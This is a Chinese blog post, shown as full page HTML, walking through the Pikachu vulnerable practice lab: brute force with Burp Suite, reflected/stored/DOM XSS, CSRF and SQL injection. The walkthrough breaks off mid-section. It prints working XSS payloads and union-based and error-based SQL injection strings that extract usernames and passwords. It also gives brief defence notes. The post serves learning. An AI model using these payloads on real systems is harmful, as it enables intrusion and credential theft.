<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="theme-color" content="#123456"><meta name="generator" content="Hexo 4.2.0"><title>pikachu通关 - BeautyFlower</title><link rel="manifest" href="/manifest.json"><meta name="theme-color" content="#3273dc"><meta name="application-name" content="Icaurs - Hexo Theme"><meta name="msapplication-TileImage" content="icons/touch-icon-iphone.png"><meta name="msapplication-TileColor" content="#3273dc"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Icaurs - Hexo Theme"><meta name="apple-mobile-web-app-status-bar-style" content="default"><link rel="apple-touch-icon" sizes="144x144" href="icons/touch-icon-iphone.png"><link rel="apple-touch-icon" sizes="152x152" href="icons/touch-icon-ipad.png"><link rel="apple-touch-icon" sizes="72x72" href="icon/logo.ico"><link rel="apple-touch-icon" sizes="96x96" href="icon/logo.ico"><link rel="apple-touch-icon" sizes="128x128" href="icon/logo.ico"><link rel="apple-touch-icon" sizes="256x256" href="icon/logo.ico"><meta name="description" content="总耗时：两天"><meta property="og:type" content="blog"><meta property="og:title" content="pikachu通关"><meta property="og:url" content="http://example.com/post/7cfe8c25.html"><meta property="og:site_name" content="BeautyFlower"><meta property="og:description" content="总耗时：两天"><meta property="og:locale" content="en_US"><meta property="og:image" content="http://example.com/img/article/7.png"><meta property="article:published_time" content="2023-12-06T13:23:56.000Z"><meta property="article:modified_time" content="2024-09-28T16:17:20.000Z"><meta property="article:author" content="yyyyyyxnp"><meta property="article:tag" content="php"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="http://example.com/img/article/7.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/post/7cfe8c25.html"},"headline":"pikachu通关","image":["http://example.com/img/article/7.png"],"datePublished":"2023-12-06T13:23:56.000Z","dateModified":"2024-09-28T16:17:20.000Z","author":{"@type":"Person","name":"yyyyyyxnp"},"publisher":{"@type":"Organization","name":"BeautyFlower","logo":{"@type":"ImageObject","url":{"text":"BeautyFlower"}}},"description":"总耗时：两天"}</script><link rel="canonical" href="http://example.com/post/7cfe8c25.html"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><link rel="alternate" href="/atom.xml" title="BeautyFlower" type="application/atom+xml">
</head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">BeautyFlower</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/deng12yx"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><div class="card-image"><span class="image is-7by3"><img class="fill" src="/img/article/7.png" alt="pikachu通关"></span></div><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item copyright article-title type-2">原创</span><span class="level-item">Posted&nbsp;<time dateTime="2023-12-06T13:23:56.000Z" title="2023/12/6 21:23:56">2023-12-06</time></span><span class="level-item">Updated&nbsp;<time dateTime="2024-09-28T16:17:20.000Z" title="2024/9/29 00:17:20">2024-09-29</time></span><span class="level-item"><a class="link-muted" href="/categories/%E5%AE%89%E5%85%A8/">安全</a></span><span class="level-item">42 minutes read (About 6357 words)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>&nbsp;visits</span></div></div><h1 class="title is-3 is-size-4-mobile"> pikachu通关</h1><div class="copyright article-block type-2"><p>版权申明：本文为原创文章，转载请注明原文出处</p><p>原文链接：<a href="http://example.com/post/7cfe8c25.html" target="_blank">http://example.com/post/7cfe8c25.html</a></p></div><h1 class="title is-3 is-size-4-mobile">pikachu通关</h1><div class="content"><p>总耗时：两天</p>
<span id="more"></span>
<p>常见漏洞学习：<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1697045">PHP一些常见的漏洞梳理-腾讯云开发者社区-腾讯云
(tencent.com)</a></p>
<h2 id="pikachu通关">pikachu通关</h2>
<h3 id="暴力破解">暴力破解</h3>
<h4 id="基于表单的暴力破解">基于表单的暴力破解</h4>
<p>lz随便试了下admin+123456就顺利通过了</p>
<figure>
<img src="/post/7cfe8c25/image-20231207133307422.png" alt="image-20231207133307422">
<figcaption aria-hidden="true">image-20231207133307422</figcaption>
</figure>
<h4 id="验证码绕过on-server">验证码绕过（On server）</h4>
<p>利用burpsuite抓包，通过测试发现看到多次repeat相同的vcode也可以，说明验证码不是一次性</p>
<p>还是可以用上面基于表单的暴力破解方式</p>
<h4 id="验证码绕过on-client">验证码绕过（On Client）</h4>
<p>由于是前端验证，所以只有在浏览器访问时验证码填错会有提示，导致用户密码无法传到后端</p>
<p><img src="/post/7cfe8c25/image-20231207135044509.png" alt="image-20231207135044509" style="zoom:50%;"></p>
<p>但是用repeater发送我们构造的请求包时省去了前端验证这一阶段，直接向后端发送数据，就算不用验证码也可以正确返回，如图所示，并不是验证码输入错误，或者没有输入</p>
<p><img src="/post/7cfe8c25/image-20231207135214447.png" alt="image-20231207135214447" style="zoom:50%;"></p>
<h4 id="token防爆破">token防爆破</h4>
<p>同一个token发送两次效果如下</p>
<p><img src="/post/7cfe8c25/image-20231207135501884.png" alt="image-20231207135501884" style="zoom: 25%;"></p>
<p>通过分析网站源代码可以看到该token出现在前端html文件上，爆破时添加上该value值作为传递的token</p>
<p><img src="/post/7cfe8c25/image-20231207140104370.png" alt="image-20231207140104370" style="zoom:25%;"></p>
<p>顺便学习burp四种爆破方式</p>
<ol type="1">
<li><p>Sinper（狙击手）</p>
<p>sinper使用一个字典，主要是将标记的数据进行逐个遍历替换
爆破次数=标记字段数*字典字段数</p></li>
<li><p>Battering ram（攻城槌）：</p>
<p>Battering
ram使用一个字典，将包内所有标记的数据进行同时替换再发出，也就是每次爆破每个要爆破的地方的值都会是一样，因为是同时向后更新
爆破次数=字典字段数量</p></li>
<li><p>Pitchfork（干草叉）：</p>
<p>Pitchfork对每个标记字段单独设置字典，按照一一对应的关系取最少的组合，和Batter类似，但是会为每一个标记字段单独设置字典
爆破次数=最少的字段字段数</p></li>
<li><p>Cluster bomb（集束炸弹）：</p>
<p>Cluster
bomb使用穷举法，对每个标记字段都遍历字典，和pitchFork一样为每一个标记字段单独设置字典，并用穷举更新而不是一起往后移动</p></li>
</ol>
<p>爆破次数=每个字典数量的乘积</p>
<p>这里我采用Cluster
bomb爆破方式，并选取三个标记点，通过测试发现集束炸弹不行，的用pitchFork才能正确匹配，可能是Grep
-
Extract可用于将响应中的有用信息提取到攻击结果表中。对于列表中配置的每个项，burp将添加一个新的results列，其中包含为该项提取的文本。但是由于该方式是进行穷举推荐，所以没办法进行一一匹配</p>
<p><img src="/post/7cfe8c25/image-20231207142928283.png" alt="image-20231207142928283" style="zoom: 25%;"></p>
<p>添加该字段作为token</p>
<p><img src="/post/7cfe8c25/image-20231207143109087.png" alt="image-20231207143109087" style="zoom: 25%;"></p>
<p>username，password，token添加方式如下</p>
<p><img src="/post/7cfe8c25/image-20231207143258768.png" alt="image-20231207143258768" style="zoom:25%;"><img src="/post/7cfe8c25/image-20231207143317448.png" alt="image-20231207143317448" style="zoom:25%;"><img src="/post/7cfe8c25/image-20231207143349561.png" alt="image-20231207143349561" style="zoom:25%;"></p>
<p>如图所示，成功爆破</p>
<p><img src="/post/7cfe8c25/image-20231207144353654.png" alt="image-20231207144353654" style="zoom: 25%;"></p>
<h3 id="跨站脚本攻击">跨站脚本攻击</h3>
<h4 id="反射型xssget">反射型xss（get）</h4>
<p>通过测试发现输入有长度限制，应该是前端做了限制，通过查看源代码检查</p>
<p><img src="/post/7cfe8c25/image-20231207144620852.png" alt="image-20231207144620852" style="zoom:33%;"></p>
<p>传到burp的重放窗口即可</p>
<p><img src="/post/7cfe8c25/image-20231207144956253.png" alt="image-20231207144956253" style="zoom: 25%;"></p>
<p>将我们要传入的参数构造成url</p>
<p><img src="/post/7cfe8c25/image-20231207145340312.png" alt="image-20231207145340312" style="zoom:33%;"></p>
<h4 id="反射型xsspost">反射型xss（post）</h4>
<p>在构造语句上写上我们构造的xss漏洞即可，登陆之后会这样显示</p>
<p><img src="/post/7cfe8c25/image-20231207150023707.png" alt="image-20231207150023707" style="zoom: 33%;"><img src="/post/7cfe8c25/image-20231207150036718.png" alt="image-20231207150036718" style="zoom: 33%;"></p>
<h4 id="存储型xss">存储型xss</h4>
<p>留言什么下面就会显示什么，就将我们构造好的xss语句留言到下面，就会弹出cookie</p>
<p><img src="/post/7cfe8c25/image-20231207150257560.png" alt="image-20231207150257560" style="zoom:33%;"><img src="/post/7cfe8c25/image-20231207150225795.png" alt="image-20231207150225795" style="zoom:33%;"></p>
<h4 id="dom型xss">DOM型xss</h4>
<p>我们输入什么下面的what do you
see会帮我们构造一个我们输入的内容的链接</p>
<p><img src="/post/7cfe8c25/image-20231207150613426.png" alt="image-20231207150613426" style="zoom:33%;"><img src="/post/7cfe8c25/image-20231207150622126.png" alt="image-20231207150622126" style="zoom:33%;"></p>
<p>查看前端逻辑，这儿是将text作为url，但是这里的str是有我们输入的，我们可以想办法使得该处能执行我们构造的xss恶意代码</p>
<p><img src="/post/7cfe8c25/image-20231207150801035.png" alt="image-20231207150801035" style="zoom:33%;"></p>
<p>我们构造语句使得href闭合，并构造出了onclick的命令，使得点击该按钮会弹出cookie，效果如图所示</p>
<p><img src="/post/7cfe8c25/image-20231207151232033.png" alt="image-20231207151232033" style="zoom:25%;"><img src="/post/7cfe8c25/image-20231207151319448.png" alt="image-20231207151319448" style="zoom:33%;"></p>
<h4 id="dom型xss-x">DOM型xss-x</h4>
<p>一样的构造方式</p>
<p><img src="/post/7cfe8c25/image-20231207151544599.png" alt="image-20231207151544599" style="zoom:33%;"></p>
<h4 id="xss之盲打">xss之盲打</h4>
<p>插入xss登陆后台弹出了cookie（奇奇怪怪）</p>
<p><img src="/post/7cfe8c25/image-20231207152227212.png" alt="image-20231207152227212" style="zoom: 25%;"></p>
<h4 id="xss之过滤">xss之过滤</h4>
<p>如图所示，明显的过滤掉了后面的所有内容</p>
<p><img src="/post/7cfe8c25/image-20231207152449174.png" alt="image-20231207152449174" style="zoom:25%;"></p>
<p>通过多次测试发现<code>&lt;script&gt;</code>被过滤掉了，搜索之后发现了</p>
<h5 id="绕过-script过滤">绕过 <code>&lt;SCRIPT&gt;</code>过滤</h5>
<p>有些过滤器会过滤到<code>&lt;script&gt;</code>标签，那上面的例子就都废了，但是还是有方法插入
javascript 的。我 们看看事件处理器的例子。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BODY onload=&quot;alert(&#x27;XSS&#x27;)&quot;&gt; </span><br></pre></td></tr></table></figure>
<p>在 html 里啊。这个 Onload
关键字就是一个事件，其他的所有标签都没有这个属性，但是 Body 标签是
有的。但是，有一定的局限性，如果 onload
事件在你的代码之前已经被处理了。那就不会触发了</p>
<p>如图所示，再次成功获取到cookie</p>
<p><img src="/post/7cfe8c25/image-20231207153052193.png" alt="image-20231207153052193" style="zoom:25%;"></p>
<h4 id="xss之htmlspecialchars">xss之htmlspecialchars</h4>
<p>如图所示，我们输入的内容会被放入href中，所以采取的方式是将href进行闭合然后增加onclick函数功能执行xss恶意代码，构造效果如下图所示</p>
<p><img src="/post/7cfe8c25/image-20231207153809546.png" alt="image-20231207153809546" style="zoom: 25%;"><img src="/post/7cfe8c25/image-20231207153949758.png" alt="image-20231207153949758" style="zoom:25%;"></p>
<p>同样的构造方式发现单引号没办法使href闭合</p>
<p><img src="/post/7cfe8c25/image-20231207154126687.png" alt="image-20231207154126687" style="zoom:25%;"></p>
<p>这里通过学习发现要用js伪协议</p>
<h5 id="javascript伪协议是什么">JavaScript伪协议是什么？</h5>
<p>伪协议不同于因特网上所真实存在的协议，如http://，https://，ftp://，</p>
<p>而是为关联应用程序而使用的.如:tencent://(关联QQ)，data:(用base64编码来在浏览器端输出二进制文件)，还有就是javascript:</p>
<p>我们可以在浏览地址栏里输入"javascript:alert(‘JS!’);"，点转到后会发现，实际上是把javascript:后面的代码当JavaScript来执行，并将结果值返回给当前页面。</p>
<p>通俗地讲，JavaScript伪协议不是真实存在的协议，它的功能是将JavaScript：后面的语句当做JavaScript代码在本页面执行，并不跳转到其他网页，而是结果返回给当前页面，相当于一个伪造的超链接，它经常与a标签一起使用，如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=javascript:alert(/xss/) &gt; 点击我&lt;/a&gt;</span><br></pre></td></tr></table></figure>
<p>功能是在当前页面弹出一个弹窗</p>
<p>如图所示，通过构造javascript伪协议成功获取了cookie</p>
<p><img src="/post/7cfe8c25/image-20231207154931831.png" alt="image-20231207154931831" style="zoom:25%;"></p>
<h4 id="xss之js输出">xss之js输出</h4>
<p>查看源代码发现我们输入的内容直接就在前端的script里面，所以我们只需要添加好我们要构造的xss之后闭合，构造内容为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nba&#x27;;alert(document.cookie);$ms=&#x27;tmac</span><br></pre></td></tr></table></figure>
<p><img src="/post/7cfe8c25/image-20231207155513682.png" alt="image-20231207155513682" style="zoom: 25%;"><img src="/post/7cfe8c25/image-20231207155706434.png" alt="image-20231207155706434" style="zoom: 40%;"><img src="/post/7cfe8c25/image-20231207155417236.png" alt="image-20231207155417236" style="zoom: 25%;"></p>
<h4 id="xss防范">XSS防范</h4>
<p><strong>输入过滤：对输入进行过滤，不允许可能导致XSS攻击的字符输入;</strong></p>
<p><strong>输出转义：根据输出点的位置对输出到前端的内容进行适当转义;</strong></p>
<h3 id="crsf">CRSF</h3>
<h4 id="crsfget">CRSF(get)</h4>
<p>将修改个人信息的请求包通过burpsuite生成POC（一个HTML页面），就是这个html相当于已经将所有修改的信息已经构造好了，只需要用户点击按钮就可以了，如下图所示是生成的html代码</p>
<p><img src="/post/7cfe8c25/image-20231207190431681.png" alt="image-20231207190431681" style="zoom:33%;"></p>
<p>按理说要将这个文件上传看到效果，但是该任务没有上传文件的接口，所以我尝试将构造的html放在源码中，如下图更改成功了</p>
<p><img src="/post/7cfe8c25/image-20231207190951656.png" alt="image-20231207190951656" style="zoom:25%;"><img src="/post/7cfe8c25/image-20231207191022383.png" alt="image-20231207191022383" style="zoom:25%;"></p>
<h4 id="crsfpost">CRSF(post)</h4>
<p>一样的方式构造，如图所示</p>
<p><img src="/post/7cfe8c25/image-20231207191553418.png" alt="image-20231207191553418" style="zoom: 25%;"><img src="/post/7cfe8c25/image-20231207191727734.png" alt="image-20231207191727734" style="zoom:25%;"></p>
<h4 id="crsftoken">CRSF(Token)</h4>
<p>还是先用burpsuite抓包，可以看到这次虽然还是get的请求包但是请求头的参数多了token</p>
<p><img src="/post/7cfe8c25/image-20231208082955540.png" alt="image-20231208082955540" style="zoom: 33%;"></p>
<p>无法进行crsf攻击，因为每次的token都是一次性生成的，当每次提交表单时，这个<code>Token</code>值就会传到后台与<code>SESSION</code>中的<code>Token</code>进行比较，若不相等，此次表单则提交失败。所以黑客由于不能得知用户当前的<code>Token</code>值，从而无法进行CSRF攻击。</p>
<h4 id="csrf防范">CSRF防范</h4>
<ul>
<li>对敏感信息的操作增加安全的token；</li>
<li>对敏感信息的操作增加安全的验证码；</li>
<li>对敏感信息的操作实施安全的逻辑流程，比如修改密码时，需要先校验旧密码等。</li>
</ul>
<h3 id="sql-inject"><strong>SQL-Inject</strong></h3>
<h4 id="数字型注入post">数字型注入（post）</h4>
<p>可以看到是通过单选框选择的id，所以用burpsuite抓包测试，通过检验发现是数字型</p>
<p><img src="/post/7cfe8c25/image-20231208083917080.png" alt="image-20231208083917080" style="zoom: 25%;"></p>
<p>构造如下代码获取返回数据的长度，数据库，表，数据</p>
<p><img src="/post/7cfe8c25/image-20231208084055778.png" alt="image-20231208084055778" style="zoom: 30%;">
<img src="/post/7cfe8c25/image-20231208084125041.png" alt="image-20231208084125041" style="zoom: 33%;">
<img src="/post/7cfe8c25/image-20231208084151070.png" alt="image-20231208084151070" style="zoom: 33%;">
<img src="/post/7cfe8c25/image-20231208084321677.png" alt="image-20231208084321677" style="zoom:25%;"><img src="/post/7cfe8c25/image-20231208084431089.png" alt="image-20231208084431089" style="zoom:25%;">
<img src="/post/7cfe8c25/image-20231208084636244.png" alt="image-20231208084636244" style="zoom:25%;"></p>
<h4 id="字符型注入post">字符型注入（POST）</h4>
<p>该板块和数字型区别就是该板块需要闭合单引号，并且对后面添加注释，构造语句如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">-1</span><span class="string">&#x27; union select group_concat(username),group_concat(password) from users where id=1 or id =2#</span></span><br></pre></td></tr></table></figure>
<p>结果如下</p>
<p><img src="/post/7cfe8c25/image-20231208085336753.png" alt="image-20231208085336753" style="zoom:50%;"></p>
<h4 id="搜索型注入">搜索型注入</h4>
<p>模糊查询的语句一般如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> username <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> username <span class="keyword">like</span> <span class="string">&#x27;%&#123;$username&#125;%&#x27;</span>;</span><br></pre></td></tr></table></figure>
<p>所以需要将%闭合才能执行我们的查询</p>
<p>爆破查询</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">-1</span><span class="operator">%</span><span class="string">&#x27; union select 1,2,concat_ws(&#x27;</span><span class="operator">-</span><span class="string">&#x27;,username,password) from users #</span></span><br></pre></td></tr></table></figure>
<p><img src="/post/7cfe8c25/image-20231208090040649.png" alt="image-20231208090040649" style="zoom:25%;"></p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">这段 SQL 查询的含义是从名为 users 的表中选择三列数据，并在第三列中使用 CONCAT<span class="built_in">_</span>WS 函数连接 username 列和 password 列，并使用横杠 - 作为分隔符。这是一种常见的方式，用于在 SQL 注入攻击中尝试获取用户凭证信息的测试。</span><br><span class="line"></span><br><span class="line">具体来说：</span><br><span class="line"></span><br><span class="line">select 1,2,concat<span class="built_in">_</span>ws(&#x27;-&#x27;,username,password) from users: 选择了三列数据，第一列是常数 1，第二列是常数 2，第三列使用 CONCAT<span class="built_in">_</span>WS 将 username 和 password 以横杠分隔的形式连接在一起。</span><br></pre></td></tr></table></figure>
<h4 id="xx型注入">xx型注入</h4>
<p>尝试字符型报错如下,1"是我们构造的，</p>
<p><img src="/post/7cfe8c25/image-20231208101757511.png" alt="image-20231208101757511" style="zoom: 33%;"></p>
<p>猜测sql查询语句如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> username <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> username<span class="operator">=</span>(<span class="string">&#x27;$name&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>构造语句如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27;) union select concat_ws(&#x27;</span><span class="operator">-</span><span class="string">&#x27;,username, password),2 from users #</span></span><br></pre></td></tr></table></figure>
<p>结果</p>
<p><img src="/post/7cfe8c25/image-20231208102737831.png" alt="image-20231208102737831" style="zoom:33%;"></p>
<h4 id="insertupdate注入">"insert/update"注入</h4>
<h5 id="insert">insert</h5>
<p>首先构造如下：<code>flower','123','123','123','123','123')#</code></p>
<p>发现提示注册成功，说明对应的sql语句应该是
<code>$query="insert into ember(username,pw,sex,phonenum,email,address) values('$username','$password','$sex','$phonenum','$email','add')";</code></p>
<p>但是注册成功并不会显示什么，就算我们在这里构造了select语句也没办法看到返回，但是当我们构造的语句使得sql语句无法执行时会出现报错</p>
<p><img src="/post/7cfe8c25/image-20231208105758494.png" alt="image-20231208105758494" style="zoom:33%;"></p>
<p>所以只能考虑将我们要输出的内容输出到报错中，使用报错注入，可以使用</p>
<h6 id="updatexml">updatexml</h6>
<p><strong>updatexml()</strong>构造如下sql语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flower<span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27; and updatexml(1,concat(&#x27;</span><span class="operator">~</span><span class="string">&#x27;,database()),1)) #</span></span><br></pre></td></tr></table></figure>
<p><strong>疑惑点：</strong></p>
<ul>
<li><p>为什么这样可以返回数据库：<code>select count(*) from users group by floor(rand(0)*2) and updatexml(1,concat('~',database()),1)</code>
，但是这样不行：<code>updatexml(1,concat('~',database()),1)</code></p>
<p>原因：updatexml只是一个函数，不能直接当作sql语句使用，也就是相当于floor(rand(0)*2)不能当作一个sql语句执行</p></li>
<li><p>为什么该处不能使用以下sql语句：<code>flower','123','123','123','123','123' )and updatexml(1,concat('~',database()),1)#</code></p>
<p>原因：正确的sql语句的含义是在insert中调用了updatexml函数，返回报错，但是下面的sql语句将上面的sql语句闭合之后再and一个表达式，首先insert不能and，并且updatexml只是一个函数，只能调用，不能当作sql语句</p></li>
</ul>
<p>最后构造出的sql语句为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flower<span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27; and updatexml(1,concat(&#x27;</span><span class="operator">~</span><span class="string">&#x27;,(select group_concat(concat_ws(&quot;-&quot;,username,password)) from users)),1)) #</span></span><br></pre></td></tr></table></figure>
<p>如图是返回结果，但是似乎返回结果有长度限制，只能看到admin的用户名和密码</p>
<p><img src="/post/7cfe8c25/image-20231208154603027.png" alt="image-20231208154603027" style="zoom:33%;"></p>
<h6 id="extractvalue">extractvalue</h6>
<p>类似的还有<strong>extractvalue()</strong>函数，构造如下sql语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flower<span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27; and extractvalue(1,concat(&#x27;</span><span class="operator">~</span><span class="string">&#x27;,(select group_concat(concat_ws(&quot;-&quot;,username,password)) from users)))) #</span></span><br></pre></td></tr></table></figure>
<h6 id="floor">floor</h6>
<p>构造如下sql语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flower<span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27;,&#x27;</span><span class="number">123</span><span class="string">&#x27; and (select count(*) from information_schema.tables group by concat(&#x27;</span><span class="operator">~</span><span class="string">&#x27;,database(),&#x27;</span><span class="operator">~</span><span class="string">&#x27;,floor(rand(0)*2))))#  </span></span><br></pre></td></tr></table></figure>
<p>database()就是我们可以构造的payload</p>
<p>最后构造如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flower&#x27;,&#x27;123&#x27;,&#x27;123&#x27;,&#x27;123&#x27;,&#x27;123&#x27;,&#x27;123&#x27; and (select count(*) from information_schema.tables group by concat(&#x27;~&#x27;,(select group_concat(concat_ws(&quot;-&quot;,username,password)) from users),&#x27;~&#x27;,floor(rand(0)*2))))#  </span><br></pre></td></tr></table></figure>
<p><img src="/post/7cfe8c25/image-20231208160528347.png" alt="image-20231208160528347" style="zoom:50%;"></p>
<h5 id="update">update</h5>
<p>通过测试修改信息界面构造如下payload可以成功修改信息：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">12</span><span class="string">&#x27;,phonenum=&#x27;</span><span class="number">1</span><span class="string">&#x27;,address=&#x27;</span><span class="number">1</span><span class="string">&#x27;,email=&#x27;</span><span class="number">1</span><span class="string">&#x27; where id=2#</span></span><br></pre></td></tr></table></figure>
<p>猜测查询的sql语句应该是将输入的各参数进行拼接，最后加上where语句，还是一样的方式，再语句中使用我们的报错注入</p>
<h6 id="updatexml-1">updatexml</h6>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">12</span><span class="string">&#x27;,phonenum=&#x27;</span><span class="number">1</span><span class="string">&#x27;,address=&#x27;</span><span class="number">1</span><span class="string">&#x27;,email=&#x27;</span><span class="number">1</span><span class="string">&#x27; where id=2 and updatexml(1,concat(&quot;~&quot;,database(),&quot;~&quot;),1)#</span></span><br></pre></td></tr></table></figure>
<p>成功返回</p>
<p><img src="/post/7cfe8c25/image-20231208161545861.png" alt="image-20231208161545861" style="zoom:33%;"></p>
<p>如图所示，构造以下sql语句获取用户名和密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">12&#x27;,phonenum=&#x27;1&#x27;,address=&#x27;1&#x27;,email=&#x27;1&#x27; where id=2 and updatexml(1,concat(&quot;~&quot;,(select group_concat(concat_ws(&quot;-&quot;,username,password)) from users),&quot;~&quot;),1)#</span><br></pre></td></tr></table></figure>
<p><img src="/post/7cfe8c25/image-20231208161804025.png" alt="image-20231208161804025" style="zoom:50%;"></p>
<h6 id="extractvalue-1">extractvalue</h6>
<p>构造如下sql语句</p>
